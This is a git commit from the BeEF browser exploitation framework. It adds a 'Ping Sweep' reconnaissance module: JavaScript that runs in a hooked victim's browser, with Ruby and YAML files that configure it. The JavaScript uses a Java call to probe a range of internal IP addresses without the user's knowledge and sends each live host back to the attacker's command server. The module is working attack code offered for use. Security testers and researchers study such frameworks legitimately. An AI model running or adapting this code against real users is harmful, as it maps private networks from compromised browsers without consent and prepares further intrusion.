Added Ping Sweep Module

git-svn-id: https://beef.googlecode.com/svn/trunk@1290 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-09-15 20:00:08 +00:00
parent ef2ccfa7fd
commit 96f547429d
3 changed files with 146 additions and 0 deletions
--- a/modules/recon/ping_sweep/command.js
+++ b/modules/recon/ping_sweep/command.js
@@ -0,0 +1,80 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+beef.execute(function() {
+
+    var ips = new Array();
+    ipRange = "<%= @ipRange %>";
+    timeout = "<%= @timeout %>";
+    delay = parseInt(timeout) + parseInt("<%= @delay %>");
+
+    // ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
+    // Note: if ipRange is just an IP address like 192.168.0.1, the ips array will contain only one element: ipBounds[0]
+    // (only C class IPs are supported atm). Same code as internal_network_fingerprinting module
+    ipBounds = ipRange.split('-');
+    if(ipBounds.length>1) {
+	lowerBound = ipBounds[0].split('.')[3];
+        upperBound = ipBounds[1].split('.')[3];
+	
+        for(i=lowerBound;i<=upperBound;i++){
+        	ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i
+            	ips.push(ipToTest);
+        }
+    } else {
+	ipToTest = ipBounds[0]
+	ips.push(ipToTest);
+    }
+
+    if(ips.length==1) verbose=true;
+    else verbose=false; /* enable for debug */
+
+    
+    function do_scan(host, timeout) {
+
+	var  status=false;
+	ping="";
+
+	try {
+		status = java.net.InetAddress.getByName(host).isReachable(timeout);
+	} catch(e) { /*handle exception...? */ }
+
+	if (status) {
+		ping = host + " is alive!";
+	} else {
+		if(verbose) {
+			ping = host + " is not alive";
+		}
+	}
+	return ping;
+    }
+
+
+    // call do_scan for each ip
+    // use of setInterval trick to avoid slow script warnings
+    i=0;
+    if(ips.length>1) {
+	int_id = setInterval( function() { 
+		host = do_scan(ips[i++],timeout);
+		if(host!="") beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host);
+		if(i==ips.length) { clearInterval(int_id); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host=Ping sweep finished'); }
+    	}, delay);
+    } else {
+    	host = do_scan(ips[i],timeout);
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host);
+    }
+
+});
+
--- a/modules/recon/ping_sweep/config.yaml
+++ b/modules/recon/ping_sweep/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        ping_sweep:
+            enable: true
+            category: "Recon"
+            name: "Ping Sweep"
+            description: "Discover active hosts in the internal network of the hooked browser. It works calling a Java method from JavaScript and do not require user interaction."
+            authors: ["jgaliana"]
+            target:
+                working: ["FF"]
+                not_working: ["C", "S", "O", "IE"]
--- a/modules/recon/ping_sweep/module.rb
+++ b/modules/recon/ping_sweep/module.rb
@@ -0,0 +1,40 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+#
+# Ping Sweep Module - jgaliana
+# Discover active hosts in the internal network of the hooked browser.
+# It works calling a Java method from JavaScript and do not require user interaction.
+
+
+class Ping_sweep < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'},
+        {'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '1000'},
+        {'name' => 'delay', 'ui_label' => 'Delay between requests (ms)', 'value' => '100'}
+    ]
+  end
+  
+  def post_execute
+    content = {}
+    content['host'] =@datastore['host'] if not @datastore['host'].nil?
+    if content.empty?
+      content['fail'] = 'No active hosts have been discovered.'
+    end
+    save content
+  end
+end